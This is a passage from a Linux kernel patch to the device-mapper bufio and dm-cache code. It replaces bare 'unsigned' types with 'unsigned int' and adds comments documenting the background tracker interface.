+@@ -1796,7 +1796,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 
+ 	if (block_size <= KMALLOC_MAX_SIZE &&
+ 	    (block_size < PAGE_SIZE || !is_power_of_2(block_size))) {
+-		unsigned align = min(1U << __ffs(block_size), (unsigned)PAGE_SIZE);
++		unsigned int align = min(1U << __ffs(block_size), (unsigned int)PAGE_SIZE);
+ 		snprintf(slab_name, sizeof slab_name, "dm_bufio_cache-%u", block_size);
+ 		c->slab_cache = kmem_cache_create(slab_name, block_size, align,
+ 						  SLAB_RECLAIM_ACCOUNT, NULL);
+@@ -1872,7 +1872,7 @@ EXPORT_SYMBOL_GPL(dm_bufio_client_create);
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	drop_buffers(c);
+ 
+@@ -1920,9 +1920,9 @@ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_sector_offset);
+ 
+-static unsigned get_max_age_hz(void)
++static unsigned int get_max_age_hz(void)
+ {
+-	unsigned max_age = READ_ONCE(dm_bufio_max_age);
++	unsigned int max_age = READ_ONCE(dm_bufio_max_age);
+ 
+ 	if (max_age > UINT_MAX / HZ)
+ 		max_age = UINT_MAX / HZ;
+@@ -1973,7 +1973,7 @@ static void do_global_cleanup(struct work_struct *w)
+ 	struct dm_bufio_client *locked_client = NULL;
+ 	struct dm_bufio_client *current_client;
+ 	struct dm_buffer *b;
+-	unsigned spinlock_hold_count;
++	unsigned int spinlock_hold_count;
+ 	unsigned long threshold = dm_bufio_cache_size -
+ 		dm_bufio_cache_size / DM_BUFIO_LOW_WATERMARK_RATIO;
+ 	unsigned long loops = global_num * 2;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 7887f99b82bd5..c606e6bfc3f8b 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -17,7 +17,7 @@ struct bt_work {
+ };
+ 
+ struct background_tracker {
+-	unsigned max_work;
++	unsigned int max_work;
+ 	atomic_t pending_promotes;
+ 	atomic_t pending_writebacks;
+ 	atomic_t pending_demotes;
+@@ -29,7 +29,7 @@ struct background_tracker {
+ 	struct kmem_cache *work_cache;
+ };
+ 
+-struct background_tracker *btracker_create(unsigned max_work)
++struct background_tracker *btracker_create(unsigned int max_work)
+ {
+ 	struct background_tracker *b = kmalloc(sizeof(*b), GFP_KERNEL);
+ 
+@@ -155,13 +155,13 @@ static void update_stats(struct background_tracker *b, struct policy_work *w, in
+ 	}
+ }
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b)
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_writebacks);
+ }
+ EXPORT_SYMBOL_GPL(btracker_nr_writebacks_queued);
+ 
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b)
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_demotes);
+ }
+diff --git a/drivers/md/dm-cache-background-tracker.h b/drivers/md/dm-cache-background-tracker.h
+index 27ab90dbc2752..14d3d53dc77a3 100644
+--- a/drivers/md/dm-cache-background-tracker.h
++++ b/drivers/md/dm-cache-background-tracker.h
+@@ -12,19 +12,44 @@
+ 
+ /*----------------------------------------------------------------*/
+ 
++/*
++ * The cache policy decides what background work should be performed,
++ * such as promotions, demotions and writebacks. The core cache target
++ * is in charge of performing the work, and does so when it sees fit.
++ *
++ * The background_tracker acts as a go between. Keeping track of future
++ * work that the policy has decided upon, and handing (issuing) it to
++ * the core target when requested.
++ *
++ * There is no locking in this, so calls will probably need to be
++ * protected with a spinlock.
++ */
++
+ struct background_work;
+ struct background_tracker;
+ 
+ /*
+- * FIXME: discuss lack of locking in all methods.
++ * Create a new tracker, it will not be able to queue more than
++ * 'max_work' entries.
++ */
++struct background_tracker *btracker_create(unsigned int max_work);
++
++/*
++ * Destroy the tracker. No issued, but not complete, work should
++ * exist when this is called. It is fine to have queued but unissued
++ * work.
+  */
+-struct background_tracker *btracker_create(unsigned max_work);
+ void btracker_destroy(struct background_tracker *b);
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b);
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b);
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b);
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b);
+ 
+ /*
++ * Queue some work within the tracker. 'work' should point to the work
++ * to queue, this will be copied (ownership doesn't pass).  If pwork
++ * is not NULL then it will be set to point to the tracker's internal
++ * copy of the work.
++ *
+  * returns -EINVAL iff the work is already queued.  -ENOMEM if the work
+  * couldn't be queued for another reason.
+  */
+@@ -33,11 +58,20 @@ int btracker_queue(struct background_tracker *b,
+ 		   struct policy_work **pwork);
+ 
+ /*
++ * Hands out the next piece of work to be performed.
+  * Returns -ENODATA if there's no work.
+  */
+ int btracker_issue(struct background_tracker *b, struct policy_work **work);
+-void btracker_complete(struct background_tracker *b,
+-		       struct policy_work *op);
++
++/*
++ * Informs the tracker that the work has been completed and it may forget
++ * about it.
++ */
++void btracker_complete(struct background_tracker *b, struct policy_work *op);
++
++/*
++ * Predicate to see if an origin block is already scheduled for promotion.
++ */
+ bool btracker_promotion_already_present(struct background_tracker *b,
+ 					dm_oblock_t oblock);
+ 
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index 83a5975bcc729..f5b4c996dc05f 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -104,7 +104,7 @@ struct dm_cache_metadata {
+ 	refcount_t ref_count;
+ 	struct list_head list;
+ 
+-	unsigned version;
++	unsigned int version;
+ 	struct block_device *bdev;
+ 	struct dm_block_manager *bm;
+ 	struct dm_space_map *metadata_sm;
+@@ -129,7 +129,7 @@ struct dm_cache_metadata {
+ 	bool clean_when_opened:1;
+ 
+ 	char policy_name[CACHE_POLICY_NAME_SIZE];
+-	unsigned policy_version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int policy_version[CACHE_POLICY_VERSION_SIZE];
+ 	size_t policy_hint_size;
+ 	struct dm_cache_statistics stats;
+ 
+@@ -260,10 +260,10 @@ static int superblock_lock(struct dm_cache_metadata *cmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -727,7 +727,7 @@ static int __commit_transaction(struct dm_cache_metadata *cmd,
+  */
+ #define FLAGS_MASK ((1 << 16) - 1)
+ 
+-static __le64 pack_value(dm_oblock_t block, unsigned flags)
++static __le64 pack_value(dm_oblock_t block, unsigned int flags)
+ {
+ 	uint64_t value = from_oblock(block);
+ 	value <<= 16;
+@@ -735,7 +735,7 @@ static __le64 pack_value(dm_oblock_t block, unsigned flags)
+ 	return cpu_to_le64(value);
+ }
+ 
+-static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned *flags)
++static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned int *flags)
+ {
+ 	uint64_t value = le64_to_cpu(value_le);
+ 	uint64_t b = value >> 16;
+@@ -749,7 +749,7 @@ static struct dm_cache_metadata *metadata_open(struct block_device *bdev,
+ 					       sector_t data_block_size,
+ 					       bool may_format_device,
+ 					       size_t policy_hint_size,
+-					       unsigned metadata_version)
++					       unsigned int metadata_version)
+ {
+ 	int r;
+ 	struct dm_cache_metadata *cmd;
+@@ -810,7 +810,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 						sector_t data_block_size,
+ 						bool may_format_device,
+ 						size_t policy_hint_size,
+-						unsigned metadata_version)
++						unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd, *cmd2;
+ 
+@@ -855,7 +855,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version)
++						 unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd = lookup_or_open(bdev, data_block_size, may_format_device,
+ 						       policy_hint_size, metadata_version);
+@@ -890,7 +890,7 @@ static int block_clean_combined_dirty(struct dm_cache_metadata *cmd, dm_cblock_t
+ 	int r;
+ 	__le64 value;
+ 	dm_oblock_t ob;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	r = dm_array_get_value(&cmd->info, cmd->root, from_cblock(b), &value);
+ 	if (r)
+@@ -1288,7 +1288,7 @@ static bool policy_unchanged(struct dm_cache_metadata *cmd,
+ 			     struct dm_cache_policy *policy)
+ {
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 	size_t policy_hint_size = dm_cache_policy_get_hint_size(policy);
+ 
+ 	/*
+@@ -1339,7 +1339,7 @@ static int __load_mapping_v1(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1381,7 +1381,7 @@ static int __load_mapping_v2(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1513,7 +1513,7 @@ static int __dump_mapping(void *context, uint64_t cblock, void *leaf)
+ {
+ 	__le64 value;
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	memcpy(&value, leaf, sizeof(value));
+ 	unpack_value(value, &oblock, &flags);
+@@ -1547,7 +1547,7 @@ int dm_cache_changed_this_transaction(struct dm_cache_metadata *cmd)
+ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty)
+ {
+ 	int r;
+-	unsigned flags;
++	unsigned int flags;
+ 	dm_oblock_t oblock;
+ 	__le64 value;
+ 
+@@ -1574,10 +1574,10 @@ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty
+ 
+ }
+ 
+-static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < nr_bits; i++) {
+ 		r = __dirty(cmd, to_cblock(i), test_bit(i, bits));
+ 		if (r)
+@@ -1594,7 +1594,7 @@ static int is_dirty_callback(uint32_t index, bool *value, void *context)
+ 	return 0;
+ }
+ 
+-static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r = 0;
+ 
+@@ -1613,7 +1613,7 @@ static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits,
+ }
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits,
++			    unsigned int nr_bits,
+ 			    unsigned long *bits)
+ {
+ 	int r;
+@@ -1712,7 +1712,7 @@ static int write_hints(struct dm_cache_metadata *cmd, struct dm_cache_policy *po
+ 	int r;
+ 	size_t hint_size;
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 
+ 	if (!policy_name[0] ||
+ 	    (strlen(policy_name) > sizeof(cmd->policy_name) - 1))
+diff --git a/drivers/md/dm-cache-metadata.h b/drivers/md/dm-cache-metadata.h
+index 0905f2c1615e1..b40322bc44cf7 100644
+--- a/drivers/md/dm-cache-metadata.h
++++ b/drivers/md/dm-cache-metadata.h
+@@ -60,7 +60,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version);
++						 unsigned int metadata_version);
+ 
+ void dm_cache_metadata_close(struct dm_cache_metadata *cmd);
+ 
+@@ -96,7 +96,7 @@ int dm_cache_load_mappings(struct dm_cache_metadata *cmd,
+ 			   void *context);
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits, unsigned long *bits);
++			    unsigned int nr_bits, unsigned long *bits);
+ 
+ struct dm_cache_statistics {
+ 	uint32_t read_hits;
+diff --git a/drivers/md/dm-cache-policy-internal.h b/drivers/md/dm-cache-policy-internal.h
+index 56f0a23f698c0..8e49baa78dc19 100644
+--- a/drivers/md/dm-cache-policy-internal.h
++++ b/drivers/md/dm-cache-policy-internal.h
+@@ -85,7 +85,7 @@ static inline void policy_tick(struct dm_cache_policy *p, bool can_block)
+ }
+ 
+ static inline int policy_emit_config_values(struct dm_cache_policy *p, char *result,
+-					    unsigned maxlen, ssize_t *sz_ptr)
++					    unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	if (p->emit_config_values)
+@@ -112,18 +112,18 @@ static inline void policy_allow_migrations(struct dm_cache_policy *p, bool allow
+ /*
+  * Some utility functions commonly used by policies and the core target.
+  */
+-static inline size_t bitset_size_in_bytes(unsigned nr_entries)
++static inline size_t bitset_size_in_bytes(unsigned int nr_entries)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_entries, BITS_PER_LONG);
+ }
+ 
+-static inline unsigned long *alloc_bitset(unsigned nr_entries)
++static inline unsigned long *alloc_bitset(unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	return vzalloc(s);
+ }
+ 
+-static inline void clear_bitset(void *bitset, unsigned nr_entries)
++static inline void clear_bitset(void *bitset, unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	memset(bitset, 0, s);
+@@ -154,7 +154,7 @@ void dm_cache_policy_destroy(struct dm_cache_policy *p);
+  */
+ const char *dm_cache_policy_get_name(struct dm_cache_policy *p);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p);
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p);
+ 
+ size_t dm_cache_policy_get_hint_size(struct dm_cache_policy *p);
+ 
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index a3d281fc14c3a..54343812223e8 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -23,12 +23,12 @@
+ /*
+  * Safe division functions that return zero on divide by zero.
+  */
+-static unsigned safe_div(unsigned n, unsigned d)
++static unsigned int safe_div(unsigned int n, unsigned int d)
+ {
+ 	return d ? n / d : 0u;
+ }
+ 
+-static unsigned safe_mod(unsigned n, unsigned d)
++static unsigned int safe_mod(unsigned int n, unsigned int d)
+ {
+ 	return d ? n % d : 0u;
+ }
+@@ -36,10 +36,10 @@ static unsigned safe_mod(unsigned n, unsigned d)
+ /*----------------------------------------------------------------*/
+ 
+ struct entry {
+-	unsigned hash_next:28;
+-	unsigned prev:28;
+-	unsigned next:28;
+-	unsigned level:6;
++	unsigned int hash_next:28;
++	unsigned int prev:28;
++	unsigned int next:28;
++	unsigned int level:6;
+ 	bool dirty:1;
+ 	bool allocated:1;
+ 	bool sentinel:1;
+@@ -62,7 +62,7 @@ struct entry_space {
+ 	struct entry *end;
+ };
+ 
+-static int space_init(struct entry_space *es, unsigned nr_entries)
++static int space_init(struct entry_space *es, unsigned int nr_entries)
+ {
+ 	if (!nr_entries) {
+ 		es->begin = es->end = NULL;
+@@ -82,7 +82,7 @@ static void space_exit(struct entry_space *es)
+ 	vfree(es->begin);
+ }
+ 
+-static struct entry *__get_entry(struct entry_space *es, unsigned block)
++static struct entry *__get_entry(struct entry_space *es, unsigned int block)
+ {
+ 	struct entry *e;
+ 
+@@ -92,13 +92,13 @@ static struct entry *__get_entry(struct entry_space *es, unsigned block)
+ 	return e;
+ }
+ 
+-static unsigned to_index(struct entry_space *es, struct entry *e)
++static unsigned int to_index(struct entry_space *es, struct entry *e)
+ {
+ 	BUG_ON(e < es->begin || e >= es->end);
+ 	return e - es->begin;
+ }
+ 
+-static struct entry *to_entry(struct entry_space *es, unsigned block)
++static struct entry *to_entry(struct entry_space *es, unsigned int block)
+ {
+ 	if (block == INDEXER_NULL)
+ 		return NULL;
+@@ -109,8 +109,8 @@ static struct entry *to_entry(struct entry_space *es, unsigned block)
+ /*----------------------------------------------------------------*/
+ 
+ struct ilist {
+-	unsigned nr_elts;	/* excluding sentinel entries */
+-	unsigned head, tail;
++	unsigned int nr_elts;	/* excluding sentinel entries */
++	unsigned int head, tail;
+ };
+ 
+ static void l_init(struct ilist *l)
+@@ -252,23 +252,23 @@ static struct entry *l_pop_tail(struct entry_space *es, struct ilist *l)
+ struct queue {
+ 	struct entry_space *es;
+ 
+-	unsigned nr_elts;
+-	unsigned nr_levels;
++	unsigned int nr_elts;
++	unsigned int nr_levels;
+ 	struct ilist qs[MAX_LEVELS];
+ 
+ 	/*
+ 	 * We maintain a count of the number of entries we would like in each
+ 	 * level.
+ 	 */
+-	unsigned last_target_nr_elts;
+-	unsigned nr_top_levels;
+-	unsigned nr_in_top_levels;
+-	unsigned target_count[MAX_LEVELS];
++	unsigned int last_target_nr_elts;
++	unsigned int nr_top_levels;
++	unsigned int nr_in_top_levels;
++	unsigned int target_count[MAX_LEVELS];
+ };
+ 
+-static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
++static void q_init(struct queue *q, struct entry_space *es, unsigned int nr_levels)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	q->es = es;
+ 	q->nr_elts = 0;
+@@ -284,7 +284,7 @@ static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
+ 	q->nr_in_top_levels = 0u;
+ }
+ 
+-static unsigned q_size(struct queue *q)
++static unsigned int q_size(struct queue *q)
+ {
+ 	return q->nr_elts;
+ }
+@@ -332,9 +332,9 @@ static void q_del(struct queue *q, struct entry *e)
+ /*
+  * Return the oldest entry of the lowest populated level.
+  */
+-static struct entry *q_peek(struct queue *q, unsigned max_level, bool can_cross_sentinel)
++static struct entry *q_peek(struct queue *q, unsigned int max_level, bool can_cross_sentinel)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *e;
+ 
+ 	max_level = min(max_level, q->nr_levels);
+@@ -369,7 +369,7 @@ static struct entry *q_pop(struct queue *q)
+  * used by redistribute, so we know this is true.  It also doesn't adjust
+  * the q->nr_elts count.
+  */
+-static struct entry *__redist_pop_from(struct queue *q, unsigned level)
++static struct entry *__redist_pop_from(struct queue *q, unsigned int level)
+ {
+ 	struct entry *e;
+ 
+@@ -383,9 +383,10 @@ static struct entry *__redist_pop_from(struct queue *q, unsigned level)
+ 	return NULL;
+ }
+ 
+-static void q_set_targets_subrange_(struct queue *q, unsigned nr_elts, unsigned lbegin, unsigned lend)
++static void q_set_targets_subrange_(struct queue *q, unsigned int nr_elts,
++				    unsigned int lbegin, unsigned int lend)
+ {
+-	unsigned level, nr_levels, entries_per_level, remainder;
++	unsigned int level, nr_levels, entries_per_level, remainder;
+ 
+ 	BUG_ON(lbegin > lend);
+ 	BUG_ON(lend > q->nr_levels);
+@@ -426,7 +427,7 @@ static void q_set_targets(struct queue *q)
+ 
+ static void q_redistribute(struct queue *q)
+ {
+-	unsigned target, level;
++	unsigned int target, level;
+ 	struct ilist *l, *l_above;
+ 	struct entry *e;
+ 
+@@ -467,12 +468,12 @@ static void q_redistribute(struct queue *q)
+ 	}
+ }
+ 
+-static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
++static void q_requeue(struct queue *q, struct entry *e, unsigned int extra_levels,
+ 		      struct entry *s1, struct entry *s2)
+ {
+ 	struct entry *de;
+-	unsigned sentinels_passed = 0;
+-	unsigned new_level = min(q->nr_levels - 1u, e->level + extra_levels);
++	unsigned int sentinels_passed = 0;
++	unsigned int new_level = min(q->nr_levels - 1u, e->level + extra_levels);
+ 
+ 	/* try and find an entry to swap with */
+ 	if (extra_levels && (e->level < q->nr_levels - 1u)) {
+@@ -512,9 +513,9 @@ static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
+ #define EIGHTH (1u << (FP_SHIFT - 3u))
+ 
+ struct stats {
+-	unsigned hit_threshold;
+-	unsigned hits;
+-	unsigned misses;
++	unsigned int hit_threshold;
++	unsigned int hits;
++	unsigned int misses;
+ };
+ 
+ enum performance {
+@@ -523,7 +524,7 @@ enum performance {
+ 	Q_WELL
+ };
+ 
+-static void stats_init(struct stats *s, unsigned nr_levels)
++static void stats_init(struct stats *s, unsigned int nr_levels)
+ {
+ 	s->hit_threshold = (nr_levels * 3u) / 4u;
+ 	s->hits = 0u;
+@@ -535,7 +536,7 @@ static void stats_reset(struct stats *s)
+ 	s->hits = s->misses = 0u;
+ }
+ 
+-static void stats_level_accessed(struct stats *s, unsigned level)
++static void stats_level_accessed(struct stats *s, unsigned int level)
+ {
+ 	if (level >= s->hit_threshold)
+ 		s->hits++;
+@@ -556,7 +557,7 @@ static void stats_miss(struct stats *s)
+  */
+ static enum performance stats_assess(struct stats *s)
+ {
+-	unsigned confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
++	unsigned int confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
+ 
+ 	if (confidence < SIXTEENTH)
+ 		return Q_POOR;
+@@ -573,16 +574,16 @@ static enum performance stats_assess(struct stats *s)
+ struct smq_hash_table {
+ 	struct entry_space *es;
+ 	unsigned long long hash_bits;
+-	unsigned *buckets;
++	unsigned int *buckets;
+ };
+ 
+ /*
+  * All cache entries are stored in a chained hash table.  To save space we
+  * use indexing again, and only store indexes to the next entry.
+  */
+-static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned nr_entries)
++static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned int nr_entries)
+ {
+-	unsigned i, nr_buckets;
++	unsigned int i, nr_buckets;
+ 
+ 	ht->es = es;
+ 	nr_buckets = roundup_pow_of_two(max(nr_entries / 4u, 16u));
+@@ -603,7 +604,7 @@ static void h_exit(struct smq_hash_table *ht)
+ 	vfree(ht->buckets);
+ }
+ 
+-static struct entry *h_head(struct smq_hash_table *ht, unsigned bucket)
++static struct entry *h_head(struct smq_hash_table *ht, unsigned int bucket)
+ {
+ 	return to_entry(ht->es, ht->buckets[bucket]);
+ }
+@@ -613,7 +614,7 @@ static struct entry *h_next(struct smq_hash_table *ht, struct entry *e)
+ 	return to_entry(ht->es, e->hash_next);
+ }
+ 
+-static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry *e)
++static void __h_insert(struct smq_hash_table *ht, unsigned int bucket, struct entry *e)
+ {
+ 	e->hash_next = ht->buckets[bucket];
+ 	ht->buckets[bucket] = to_index(ht->es, e);
+@@ -621,11 +622,11 @@ static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry
+ 
+ static void h_insert(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	__h_insert(ht, h, e);
+ }
+ 
+-static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock_t oblock,
++static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned int h, dm_oblock_t oblock,
+ 				struct entry **prev)
+ {
+ 	struct entry *e;
+@@ -641,7 +642,7 @@ static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock
+ 	return NULL;
+ }
+ 
+-static void __h_unlink(struct smq_hash_table *ht, unsigned h,
++static void __h_unlink(struct smq_hash_table *ht, unsigned int h,
+ 		       struct entry *e, struct entry *prev)
+ {
+ 	if (prev)
+@@ -656,7 +657,7 @@ static void __h_unlink(struct smq_hash_table *ht, unsigned h,
+ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ {
+ 	struct entry *e, *prev;
+-	unsigned h = hash_64(from_oblock(oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(oblock), ht->hash_bits);
+ 
+ 	e = __h_lookup(ht, h, oblock, &prev);
+ 	if (e && prev) {
+@@ -673,7 +674,7 @@ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ 
+ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	struct entry *prev;
+ 
+ 	/*
+@@ -689,16 +690,16 @@ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ 
+ struct entry_alloc {
+ 	struct entry_space *es;
+-	unsigned begin;
++	unsigned int begin;
+ 
+-	unsigned nr_allocated;
++	unsigned int nr_allocated;
+ 	struct ilist free;
+ };
+ 
+ static void init_allocator(struct entry_alloc *ea, struct entry_space *es,
+-			   unsigned begin, unsigned end)
++			   unsigned int begin, unsigned int end)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	ea->es = es;
+ 	ea->nr_allocated = 0u;
+@@ -742,7 +743,7 @@ static struct entry *alloc_entry(struct entry_alloc *ea)
+ /*
+  * This assumes the cblock hasn't already been allocated.
+  */
+-static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned i)
++static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned int i)
+ {
+ 	struct entry *e = __get_entry(ea->es, ea->begin + i);
+ 
+@@ -770,12 +771,12 @@ static bool allocator_empty(struct entry_alloc *ea)
+ 	return l_empty(&ea->free);
+ }
+ 
+-static unsigned get_index(struct entry_alloc *ea, struct entry *e)
++static unsigned int get_index(struct entry_alloc *ea, struct entry *e)
+ {
+ 	return to_index(ea->es, e) - ea->begin;
+ }
+ 
+-static struct entry *get_entry(struct entry_alloc *ea, unsigned index)
++static struct entry *get_entry(struct entry_alloc *ea, unsigned int index)
+ {
+ 	return __get_entry(ea->es, ea->begin + index);
+ }
+@@ -800,9 +801,9 @@ struct smq_policy {
+ 	sector_t cache_block_size;
+ 
+ 	sector_t hotspot_block_size;
+-	unsigned nr_hotspot_blocks;
+-	unsigned cache_blocks_per_hotspot_block;
+-	unsigned hotspot_level_jump;
++	unsigned int nr_hotspot_blocks;
++	unsigned int cache_blocks_per_hotspot_block;
++	unsigned int hotspot_level_jump;
+ 
+ 	struct entry_space es;
+ 	struct entry_alloc writeback_sentinel_alloc;
+@@ -831,7 +832,7 @@ struct smq_policy {
+ 	 * Keeps track of time, incremented by the core.  We use this to
+ 	 * avoid attributing multiple hits within the same tick.
+ 	 */
+-	unsigned tick;
++	unsigned int tick;
+ 
+ 	/*
+ 	 * The hash tables allows us to quickly find an entry by origin
+@@ -846,8 +847,8 @@ struct smq_policy {
+ 	bool current_demote_sentinels;
+ 	unsigned long next_demote_period;
+ 
+-	unsigned write_promote_level;
+-	unsigned read_promote_level;
++	unsigned int write_promote_level;
++	unsigned int read_promote_level;
+ 
+ 	unsigned long next_hotspot_period;
+ 	unsigned long next_cache_period;
+@@ -859,24 +860,24 @@ struct smq_policy {
+ 
+ /*----------------------------------------------------------------*/
+ 
+-static struct entry *get_sentinel(struct entry_alloc *ea, unsigned level, bool which)
++static struct entry *get_sentinel(struct entry_alloc *ea, unsigned int level, bool which)
+ {
+ 	return get_entry(ea, which ? level : NR_CACHE_LEVELS + level);
+ }
+ 
+-static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->writeback_sentinel_alloc, level, mq->current_writeback_sentinels);
+ }
+ 
+-static struct entry *demote_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *demote_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->demote_sentinel_alloc, level, mq->current_demote_sentinels);
+ }
+ 
+ static void __update_writeback_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->dirty;
+ 	struct entry *sentinel;
+ 
+@@ -889,7 +890,7 @@ static void __update_writeback_sentinels(struct smq_policy *mq)
+ 
+ static void __update_demote_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->clean;
+ 	struct entry *sentinel;
+ 
+@@ -917,7 +918,7 @@ static void update_sentinels(struct smq_policy *mq)
+ 
+ static void __sentinels_init(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *sentinel;
+ 
+ 	for (level = 0; level < NR_CACHE_LEVELS; level++) {
+@@ -1008,7 +1009,7 @@ static void requeue(struct smq_policy *mq, struct entry *e)
+ 	}
+ }
+ 
+-static unsigned default_promote_level(struct smq_policy *mq)
